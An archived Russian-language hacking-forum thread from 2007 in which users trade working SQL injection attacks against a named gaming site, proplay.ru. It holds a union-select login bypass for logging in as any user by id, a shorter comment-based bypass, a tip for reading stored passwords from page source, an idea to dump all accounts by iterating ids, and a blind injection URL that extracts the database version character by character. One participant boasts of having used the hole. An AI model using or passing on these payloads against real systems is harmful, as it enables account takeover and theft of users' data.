PDA

Просмотр полной версии : Уязвимость на proplay.ru


Joker-jar
04.06.2007, 16:13
Посодействовал l1ght, за что ему большое спасибо. Суть баги в том, что можно залогиниться под любым аккаунтом следующим способом:

Логин: -1
Пароль: ' union select id,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/*

Где id - id юзера. :)

ice1k
04.06.2007, 16:37
Как уже сказал гема хватает просто:
user'/*
asd

И ещё, если хотите узнать пароль - зайдите в /users/settings/ там будет пароль за звёздочками, открывайте сорцы страницы - там будет пароль в чистом виде...

Joker-jar
04.06.2007, 16:52
Первый метод подойдет, скажем, для создания БД всех юзеров (путем перебора id).

loc
05.06.2007, 17:25
Эх.... жаль перекрыли уже :)) Но я успел поюзать .... Респект авторам!!! :cool:

BlasT
07.06.2007, 15:24
http://www.proplay.ru/forums/cs/7909'/
есть еще одна sql токо не как немогу подобрать правильное кол-во полей кто поможет?

Joker-jar
09.06.2007, 11:45
:) Как подбираешь? Это не скуля, а просто бажок в скрипте, в частности, в инклудинге. Ничего там не поимеешь

З.Ы. Хотя сорри, затупил. Теперь вижу...

Joker-jar
09.06.2007, 12:03
На счет union точно не знаю. Посимвольный перебор:
http://www.proplay.ru/forums/q3'+and+ascii(lower(substring(version(),1,1)))=0x3 5+and+'1'='1/MySQL 5.x